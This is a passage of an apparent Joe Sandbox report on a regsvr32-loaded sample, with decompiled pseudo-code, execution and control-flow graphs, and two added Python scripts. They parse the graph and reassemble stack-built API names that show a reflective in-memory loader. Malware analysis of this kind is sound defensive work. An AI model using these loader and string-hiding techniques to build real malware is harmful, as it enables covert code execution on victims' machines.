                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                  • String ID:
                                                                                                  • API String ID: 953036326-0
                                                                                                  • Opcode ID: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
                                                                                                  • Instruction ID: 0d257abc0b638f0f040665fb3b769d735b9bc0d803a768daaeded027fae08968
                                                                                                  • Opcode Fuzzy Hash: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
                                                                                                  • Instruction Fuzzy Hash: 7291B13261469885F7A2CF6598403ED3BA0F749BC8F14C11AFE4A67A95DF74C68AC710
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 29%
                                                                                                  			E0000000118000DC50(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
                                                                                                  				intOrPtr _v0;
                                                                                                  				signed long long _v8;
                                                                                                  				signed int _t41;
                                                                                                  				signed long long _t62;
                                                                                                  				short* _t67;
                                                                                                  				signed int* _t68;
                                                                                                  				void* _t91;
                                                                                                  				void* _t97;
                                                                                                  				void* _t99;
                                                                                                  				void* _t102;
                                                                                                  				void* _t103;
                                                                                                  
                                                                                                  				_a8 = __rbx;
                                                                                                  				_a24 = __rbp;
                                                                                                  				E0000000118000F880(0x1470, __rax, _t97, _t99);
                                                                                                  				_t62 =  *0x80021010; // 0x5388a1408558
                                                                                                  				_a5176 = _t62 ^ _t91 - __rax;
                                                                                                  				r14d = r9d;
                                                                                                  				r10d = r10d & 0x0000003f;
                                                                                                  				_t103 = _t102 + __r8;
                                                                                                  				 *((long long*)(__rcx)) =  *((intOrPtr*)(0x800227f0 + (__edx >> 6) * 8));
                                                                                                  				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                                                  				if (__r8 - _t103 >= 0) goto 0x8000dd91;
                                                                                                  				_t67 =  &_a40;
                                                                                                  				if (__r8 - _t103 >= 0) goto 0x8000dcfa;
                                                                                                  				_t41 =  *__r8 & 0x0000ffff;
                                                                                                  				if (_t41 != 0xa) goto 0x8000dce6;
                                                                                                  				 *_t67 = 0xd;
                                                                                                  				_t68 = _t67 + 2;
                                                                                                  				 *_t68 = _t41;
                                                                                                  				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x8000dcc8;
                                                                                                  				_a16 = _a16 & 0x00000000;
                                                                                                  				_a8 = _a8 & 0x00000000;
                                                                                                  				_v0 = 0xd55;
                                                                                                  				_v8 =  &_a1752;
                                                                                                  				r9d = 0;
                                                                                                  				E0000000118000A154();
                                                                                                  				if (0 == 0) goto 0x8000dd89;
                                                                                                  				if (0 == 0) goto 0x8000dd79;
                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                  				r8d = 0;
                                                                                                  				r8d = r8d;
                                                                                                  				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000dd89;
                                                                                                  				if (0 + _a24 < 0) goto 0x8000dd46;
                                                                                                  				 *((intOrPtr*)(__rcx + 4)) = __edi - r15d;
                                                                                                  				goto 0x8000dcbd;
                                                                                                  				 *((intOrPtr*)(__rcx)) = GetLastError();
                                                                                                  				return E000000011800010B0(_t39, 0, _a5176 ^ _t91 - __rax);
                                                                                                  			}

                                                                                                  0x18000dc50
                                                                                                  0x18000dc55
                                                                                                  0x18000dc67
                                                                                                  0x18000dc6f
                                                                                                  0x18000dc79
                                                                                                  0x18000dc8a
                                                                                                  0x18000dc98
                                                                                                  0x18000dc9c
                                                                                                  0x18000dcb4
                                                                                                  0x18000dcba
                                                                                                  0x18000dcbd
                                                                                                  0x18000dcc3
                                                                                                  0x18000dccb
                                                                                                  0x18000dccd
                                                                                                  0x18000dcd8
                                                                                                  0x18000dcdf
                                                                                                  0x18000dce2
                                                                                                  0x18000dce6
                                                                                                  0x18000dcf8
                                                                                                  0x18000dcfa
                                                                                                  0x18000dd05
                                                                                                  0x18000dd13
                                                                                                  0x18000dd26
                                                                                                  0x18000dd2b
                                                                                                  0x18000dd35
                                                                                                  0x18000dd3e
                                                                                                  0x18000dd44
                                                                                                  0x18000dd46
                                                                                                  0x18000dd5b
                                                                                                  0x18000dd64
                                                                                                  0x18000dd6f
                                                                                                  0x18000dd77
                                                                                                  0x18000dd7e
                                                                                                  0x18000dd84
                                                                                                  0x18000dd8f
                                                                                                  0x18000ddbf

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                  • String ID: U
                                                                                                  • API String ID: 442123175-4171548499
                                                                                                  • Opcode ID: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
                                                                                                  • Instruction ID: c34ad0e7ff2d66e96fda8e7ac49a4eca9b2c2d7f4ff30b46897494357c1f583c
                                                                                                  • Opcode Fuzzy Hash: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
                                                                                                  • Instruction Fuzzy Hash: E441A472614A8886EBA2CF25E4447EA7761F79C7D4F408022EE4E87758DF7CC645C750
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                  • Opcode ID: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
                                                                                                  • Instruction ID: 9822ff17b0ce5fbc637df8732c669b6e85e1acb8a855211156653d926a5084e0
                                                                                                  • Opcode Fuzzy Hash: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
                                                                                                  • Instruction Fuzzy Hash: 8D114C72614B4482EBA28F25F440399B7A0F788BD4F188220EE8C0B769DF38CA55CB04
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClassCursorLoadRegister
                                                                                                  • String ID: P
                                                                                                  • API String ID: 1693014935-3110715001
                                                                                                  • Opcode ID: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
                                                                                                  • Instruction ID: c953b54a92ac3cc4e92e902e3110dd604cc2aeb839ef1ea803bcd24b7a7bdda6
                                                                                                  • Opcode Fuzzy Hash: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
                                                                                                  • Instruction Fuzzy Hash: 8501B232519F8486E7A18F00F89834BB7B4F388788F604119E6CD42B68DFBDC258CB40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:17.5%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:38
                                                                                                  Total number of Limit Nodes:4
                                                                                                  execution_graph
                                                                                                  3047 e0a7f0
                                                                                                  3048 e0a80b
                                                                                                  3047->3048
                                                                                                  3049 e0a8bc
                                                                                                  3048->3049
                                                                                                  3051 e1020c
                                                                                                  3048->3051
                                                                                                  3053 e1022b
                                                                                                  3051->3053
                                                                                                  3054 e10590
                                                                                                  3053->3054
                                                                                                  3055 e1e310
                                                                                                  3053->3055
                                                                                                  3054->3049
                                                                                                  3056 e1e423
                                                                                                  3055->3056
                                                                                                  3057 e1e5f6
                                                                                                  3056->3057
                                                                                                  3059 e040a0
                                                                                                  3056->3059
                                                                                                  3057->3053
                                                                                                  3061 e04116
                                                                                                  3059->3061
                                                                                                  3060 e041ca GetVolumeInformationW
                                                                                                  3060->3057
                                                                                                  3061->3060
                                                                                                  3086 e22ab0
                                                                                                  3089 e22aea
                                                                                                  3086->3089
                                                                                                  3087 e22c51
                                                                                                  3088 e1e9e8 Process32FirstW
                                                                                                  3088->3089
                                                                                                  3089->3087
                                                                                                  3089->3088
                                                                                                  3062 e1e9e8
                                                                                                  3065 e08bc8
                                                                                                  3062->3065
                                                                                                  3064 e1eab4
                                                                                                  3067 e08c02
                                                                                                  3065->3067
                                                                                                  3066 e08eb8
                                                                                                  3066->3064
                                                                                                  3067->3066
                                                                                                  3068 e08d6f Process32FirstW
                                                                                                  3067->3068
                                                                                                  3068->3067
                                                                                                  3069 bb0000
                                                                                                  3072 bb015a
                                                                                                  3069->3072
                                                                                                  3070 bb033f GetNativeSystemInfo
                                                                                                  3071 bb0377 VirtualAlloc
                                                                                                  3070->3071
                                                                                                  3075 bb08eb
                                                                                                  3070->3075
                                                                                                  3073 bb0395 VirtualAlloc
                                                                                                  3071->3073
                                                                                                  3078 bb03aa
                                                                                                  3071->3078
                                                                                                  3072->3070
                                                                                                  3072->3075
                                                                                                  3073->3078
                                                                                                  3074 bb0873
                                                                                                  3074->3075
                                                                                                  3076 bb08c6 RtlAddFunctionTable
                                                                                                  3074->3076
                                                                                                  3076->3075
                                                                                                  3077 bb084b VirtualProtect
                                                                                                  3077->3078
                                                                                                  3078->3074
                                                                                                  3078->3077
                                                                                                  3079 e080cc
                                                                                                  3082 e080f3
                                                                                                  3079->3082
                                                                                                  3080 e082ba
                                                                                                  3082->3080
                                                                                                  3083 e1e9e8
                                                                                                  3082->3083
                                                                                                  3084 e08bc8 Process32FirstW
                                                                                                  3083->3084
                                                                                                  3085 e1eab4
                                                                                                  3084->3085
                                                                                                  3085->3082
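The execution graph above is a flat token list: `id address [API]` declares a node and `src->dst` an edge. Read per entry point (the nodes no edge leads to), it shows the code at bb0000 inside regsvr32 reaching GetNativeSystemInfo, VirtualAlloc twice, VirtualProtect and RtlAddFunctionTable, which is the call pattern of a loader mapping a PE image into memory by hand; the other entry points reach GetVolumeInformationW and Process32FirstW. The script below is an added example, not Joe Sandbox code: it parses the graph text copied verbatim from this section and lists, per entry point, the API call nodes in address order. Ordering by address is an assumption standing in for program order, since the graph carries no timing information.

```python
"""Parse a Joe Sandbox execution_graph dump and list API calls per entry point.

Added example, not Joe Sandbox code. Grammar assumed from the dump itself:
'<id> <hex-address> [<api-name>]' declares a node, '<src>-><dst>' an edge.
"""
from dataclasses import dataclass, field

# The execution_graph line of this report section, copied verbatim.
EXECUTION_GRAPH = """execution_graph 3047 e0a7f0 3048 e0a80b 3047->3048 3049 e0a8bc
3048->3049 3051 e1020c 3048->3051 3053 e1022b 3051->3053 3054 e10590 3053->3054
3055 e1e310 3053->3055 3054->3049 3056 e1e423 3055->3056 3057 e1e5f6 3056->3057
3059 e040a0 3056->3059 3057->3053 3061 e04116 3059->3061 3060 e041ca
GetVolumeInformationW 3060->3057 3061->3060 3086 e22ab0 3089 e22aea 3086->3089
3087 e22c51 3088 e1e9e8 Process32FirstW 3088->3089 3089->3087 3089->3088
3062 e1e9e8 3065 e08bc8 3062->3065 3064 e1eab4 3067 e08c02 3065->3067 3066 e08eb8
3066->3064 3067->3066 3068 e08d6f Process32FirstW 3067->3068 3068->3067
3069 bb0000 3072 bb015a 3069->3072 3070 bb033f GetNativeSystemInfo 3071 bb0377
VirtualAlloc 3070->3071 3075 bb08eb 3070->3075 3073 bb0395 VirtualAlloc 3071->3073
3078 bb03aa 3071->3078 3072->3070 3072->3075 3073->3078 3074 bb0873 3074->3075
3076 bb08c6 RtlAddFunctionTable 3074->3076 3076->3075 3077 bb084b VirtualProtect
3077->3078 3078->3074 3078->3077 3079 e080cc 3082 e080f3 3079->3082 3080 e082ba
3082->3080 3083 e1e9e8 3082->3083 3084 e08bc8 Process32FirstW 3083->3084
3085 e1eab4 3084->3085 3085->3082"""


@dataclass
class ExecGraph:
    addr: dict = field(default_factory=dict)   # node id -> address (int)
    api: dict = field(default_factory=dict)    # node id -> API name (call nodes only)
    succ: dict = field(default_factory=dict)   # node id -> [successor ids]
    pred: dict = field(default_factory=dict)   # node id -> [predecessor ids]

    def entry_points(self) -> list:
        """Addresses of nodes that no edge leads to, i.e. where each graph starts."""
        return sorted(self.addr[n] for n in self.addr if n not in self.pred)

    def reachable(self, start: int) -> set:
        """Iterative DFS; the graph has loops (e.g. 3078->3077->3078), so track seen."""
        seen, stack = set(), [start]
        while stack:
            n = stack.pop()
            if n not in seen:
                seen.add(n)
                stack.extend(self.succ.get(n, ()))
        return seen

    def api_sequence(self, entry_addr: int) -> list:
        """API call nodes reachable from an entry point, in address order (assumed
        to approximate program order; the dump carries no timing)."""
        calls = set()
        roots = [n for n in self.addr if self.addr[n] == entry_addr and n not in self.pred]
        for root in roots:
            for n in self.reachable(root):
                if n in self.api:
                    calls.add((self.addr[n], self.api[n]))
        return [name for _, name in sorted(calls)]


def parse_execution_graph(text: str) -> ExecGraph:
    """Tokenise the dump: node ids are decimal, addresses hex, APIs identifiers."""
    toks = text.split()
    if not toks or toks[0] != "execution_graph":
        raise ValueError("not an execution_graph dump")
    g, i = ExecGraph(), 1
    while i < len(toks):
        if "->" in toks[i]:
            src, dst = (int(x) for x in toks[i].split("->"))
            g.succ.setdefault(src, []).append(dst)
            g.pred.setdefault(dst, []).append(src)
            i += 1
            continue
        node = int(toks[i])
        g.addr[node] = int(toks[i + 1], 16)
        i += 2
        # An API name follows the address only for call nodes; it is never all
        # digits (a node id) and never contains '->' (an edge).
        if i < len(toks) and "->" not in toks[i] and not toks[i].isdigit():
            g.api[node] = toks[i]
            i += 1
    return g


if __name__ == "__main__":
    g = parse_execution_graph(EXECUTION_GRAPH)
    for entry in g.entry_points():
        print(f"{entry:#x}: {g.api_sequence(entry)}")
```

The parser keeps Joe Sandbox's per-context duplicates (e1e9e8 and e08bc8 each appear under several node ids) as separate nodes; only entry-point roots are matched by address.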

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 bb0000-bb029a call bb091c * 2 13 bb02a0-bb02a4 0->13 14 bb0905 0->14 13->14 15 bb02aa-bb02ae 13->15 16 bb0907-bb091a 14->16 15->14 17 bb02b4-bb02b8 15->17 17->14 18 bb02be-bb02c5 17->18 18->14 19 bb02cb-bb02dc 18->19 19->14 20 bb02e2-bb02eb 19->20 20->14 21 bb02f1-bb02fc 20->21 21->14 22 bb0302-bb0312 21->22 23 bb033f-bb0371 GetNativeSystemInfo 22->23 24 bb0314-bb031a 22->24 23->14 26 bb0377-bb0393 VirtualAlloc 23->26 25 bb031c-bb0324 24->25 27 bb032c-bb032d 25->27 28 bb0326-bb032a 25->28 29 bb03aa-bb03ae 26->29 30 bb0395-bb03a8 VirtualAlloc 26->30 33 bb032f-bb033d 27->33 28->33 31 bb03dc-bb03e3 29->31 32 bb03b0-bb03c2 29->32 30->29 35 bb03fb-bb0417 31->35 36 bb03e5-bb03f9 31->36 34 bb03d4-bb03d8 32->34 33->23 33->25 37 bb03da 34->37 38 bb03c4-bb03d1 34->38 39 bb0419-bb041a 35->39 40 bb0458-bb0465 35->40 36->35 36->36 37->35 38->34 41 bb041c-bb0422 39->41 42 bb046b-bb0472 40->42 43 bb0537-bb0542 40->43 44 bb0448-bb0456 41->44 45 bb0424-bb0446 41->45 42->43 48 bb0478-bb0485 42->48 46 bb0548-bb0559 43->46 47 bb06e6-bb06ed 43->47 44->40 44->41 45->44 45->45 49 bb0562-bb0565 46->49 51 bb07ac-bb07c3 47->51 52 bb06f3-bb0707 47->52 48->43 50 bb048b-bb048f 48->50 57 bb055b-bb055f 49->57 58 bb0567-bb0574 49->58 59 bb051b-bb0525 50->59 55 bb087a-bb088d 51->55 56 bb07c9-bb07cd 51->56 53 bb07a9-bb07aa 52->53 54 bb070d 52->54 53->51 62 bb0712-bb0736 54->62 79 bb088f-bb089a 55->79 80 bb08b3-bb08ba 55->80 63 bb07d0-bb07d3 56->63 57->49 60 bb057a-bb057d 58->60 61 bb060d-bb0619 58->61 64 bb052b-bb0531 59->64 65 bb0494-bb04a8 59->65 60->61 68 bb0583-bb059b 60->68 72 bb061f 61->72 73 bb06e2-bb06e3 61->73 89 bb0738-bb073e 62->89 90 bb0796-bb079f 62->90 70 bb07d9-bb07e9 63->70 71 bb085f-bb086d 63->71 64->43 64->50 66 bb04aa-bb04cd 65->66 67 bb04cf-bb04d3 65->67 74 bb0518-bb0519 66->74 75 bb04e3-bb04e7 67->75 76 bb04d5-bb04e1 67->76 68->61 77 bb059d-bb059e 68->77 81 bb07eb-bb07ed 70->81 82 bb080d-bb080f 70->82 71->63 84 bb0873-bb0874 71->84 83 bb0625-bb0648 72->83 73->47 74->59 87 bb04e9-bb04fc 75->87 88 bb04fe-bb0502 75->88 85 bb0511-bb0515 76->85 86 bb05a0-bb0605 77->86 91 bb08ab-bb08b1 79->91 94 bb08eb-bb0903 80->94 95 bb08bc-bb08c4 80->95 92 bb07fb-bb080b 81->92 93 bb07ef-bb07f9 81->93 96 bb0822-bb082b 82->96 97 bb0811-bb0820 82->97 110 bb064a-bb064b 83->110 111 bb06b2-bb06b7 83->111 84->55 85->74 86->86 100 bb0607 86->100 87->85 88->74 98 bb0504-bb050e 88->98 101 bb0748-bb0754 89->101 102 bb0740-bb0746 89->102 90->62 106 bb07a5-bb07a6 90->106 91->80 103 bb089c-bb08a8 91->103 99 bb082e-bb083d 92->99 93->99 94->16 95->94 105 bb08c6-bb08e9 RtlAddFunctionTable 95->105 96->99 97->99 98->85 112 bb084b-bb085c VirtualProtect 99->112 113 bb083f-bb0845 99->113 100->61 108 bb0756-bb0757 101->108 109 bb0764-bb0776 101->109 107 bb077b-bb078d 102->107 103->91 105->94 106->53 107->90 126 bb078f-bb0794 107->126 118 bb0759-bb0762 108->118 109->107 119 bb064e-bb0651 110->119 115 bb06b9-bb06bd 111->115 116 bb06ce-bb06d8 111->116 112->71 113->112 115->116 120 bb06bf-bb06c3 115->120 116->83 121 bb06de-bb06df 116->121 118->109 118->118 123 bb065b-bb0666 119->123 124 bb0653-bb0659 119->124 120->116 125 bb06c5 120->125 121->73 128 bb0668-bb0669 123->128 129 bb0676-bb0688 123->129 127 bb068d-bb06a3 124->127 125->116 126->89 132 bb06ac 127->132 133 bb06a5-bb06aa 127->133 130 bb066b-bb0674 128->130 129->127 130->129 130->130 132->111 133->119
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.632524211.0000000000BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_bb0000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                  • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                  • API String ID: 394283112-3605381585
                                                                                                  • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                  • Instruction ID: f9d2168090b9ee68639b780b19973b053e8885a7077621bd798949b053d58748
                                                                                                  • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                  • Instruction Fuzzy Hash: 75520430628B488BC729EF18D8856FAB7F1FB54304F14466DE88BC7251DB74E946CB86
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%
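The String ID line above lists four-character pieces (Virt$ualP$rote$ct, RtlA$ddFu$ncti$onTa, ...) rather than whole strings. That is the footprint of API names assembled on the stack four bytes per store and resolved at run time instead of being imported, which is also why the Strings section for this function is empty. The script below is an added example, not part of the Joe Sandbox report: it takes the fragment list copied from the String ID line and checks which API names can be tiled from it. The candidate list is an assumption drawn from the API ID tokens (Virtual, Alloc, Protect, FunctionTable, NativeSystemInfo), the two calls visible in the control-flow graph, and common loader companions whose fragments appear; CreateThread is included only as a negative control.

```python
from collections import Counter

# Constructed input: the fragment list copied from the report's String ID line
# ('$' separates entries). Each entry is a piece of an API name as it was
# written to the stack, so the report shows chunks rather than whole names.
STRING_ID = ("Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$"
             "hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP")

# Assumption, not from the report: names to test against the fragments, taken
# from the API ID tokens, the two calls in the CFG and common loader
# companions. CreateThread is a deliberate negative control.
CANDIDATES = ["VirtualAlloc", "VirtualProtect", "RtlAddFunctionTable",
              "GetNativeSystemInfo", "LoadLibraryA", "FlushInstructionCache",
              "Sleep", "CreateThread"]

WIDTH = 4  # a 32-bit store writes four bytes of the string at a time


def chunk(name: str, width: int = WIDTH) -> list[str]:
    """Split a name into the pieces a width-byte store would write: full-width
    chunks followed by one shorter tail (which may carry the NUL terminator)."""
    return [name[i:i + width] for i in range(0, len(name), width)]


def _take(pool: Counter, piece: str) -> bool:
    """Consume one copy of piece from the pool if one is available."""
    if pool[piece] > 0:
        pool[piece] -= 1
        return True
    return False


def _take_tail(pool: Counter, tail: str) -> bool:
    """The short tail may be stored as one piece or as two smaller stores
    (e.g. 'nfo' written as 'nf' then 'o'); accept either form."""
    if _take(pool, tail):
        return True
    for i in range(1, len(tail)):
        parts = Counter([tail[:i], tail[i:]])
        if all(pool[p] >= n for p, n in parts.items()):
            _take(pool, tail[:i])
            _take(pool, tail[i:])
            return True
    return False


def reassemble(fragments, candidates, width=WIDTH):
    """Tile each candidate name from the fragment pool.

    Returns (found, rejected, leftover): found maps a name to the pieces that
    could not be located (only a short tail is ever tolerated there), rejected
    maps a name to the full-width chunks that are absent, and leftover holds
    fragments no candidate explained. Longer names are matched first so a short
    name cannot steal a chunk from a long one."""
    pool = Counter(fragments)
    found, rejected = {}, {}
    for name in sorted(candidates, key=len, reverse=True):
        pieces = chunk(name, width)
        body = [p for p in pieces if len(p) == width]
        tail = [p for p in pieces if len(p) < width]
        need = Counter(body)
        absent = [p for p in need if pool[p] < need[p]]
        if absent:
            rejected[name] = absent
            continue
        for p in body:
            _take(pool, p)
        found[name] = [t for t in tail if not _take_tail(pool, t)]
    return found, rejected, +pool  # +pool drops entries whose count hit zero


def report(fragments=None, candidates=CANDIDATES):
    """Print and return the match result for the report's fragment list."""
    frags = STRING_ID.split("$") if fragments is None else fragments
    found, rejected, leftover = reassemble(frags, candidates)
    for name, missing in found.items():
        note = "" if not missing else f"  (tail {missing} not listed)"
        print(f"found    {name}{note}")
    for name, absent in rejected.items():
        print(f"rejected {name}: {absent} absent")
    print("unexplained fragments:", dict(leftover) or "none")
    return found, rejected, leftover


if __name__ == "__main__":
    report()
```

Every fragment on the line is consumed by VirtualAlloc, VirtualProtect, RtlAddFunctionTable, GetNativeSystemInfo, LoadLibraryA, FlushInstructionCache and Sleep; the only pieces not listed are one-to-three byte tails (e, ble, p), which a string scanner with a minimum length drops. The control CreateThread is rejected outright, which is the check that keeps this from being wishful matching: a name only counts when every full-width chunk is present.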

                                                                                                  Control-flow Graph

                                                                                                  Control-flow graph (rendered graph not reproduced; Executed/Not Executed colouring lost): block 401 (e040a0-e04136) calls e19f38 and branches either to block 404 (e041ca-e04202, which calls GetVolumeInformationW) or to block 405 (e0413c-e041c4, call e0a940), which then falls through to block 404.
                                                                                                  APIs
                                                                                                  • GetVolumeInformationW.KERNELBASE ref: 00E041EB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.632618428.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InformationVolume
                                                                                                  • String ID: Ql$v[
                                                                                                  • API String ID: 2039140958-138011117
                                                                                                  • Opcode ID: 3a0f33469602c5b2414fed7c4f525ce4c0e953e4a15951e85aa6350d2a5935a1
                                                                                                  • Instruction ID: 105e5b352269b3c7548b16fa6af71a6eda2f1cf9fc6d7a4a2763d1c2fb832673
                                                                                                  • Opcode Fuzzy Hash: 3a0f33469602c5b2414fed7c4f525ce4c0e953e4a15951e85aa6350d2a5935a1
                                                                                                  • Instruction Fuzzy Hash: 1131397051CB848BD7B8DF18D48579AB7E0FB88315F60895DE88CC7295CF789888CB42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%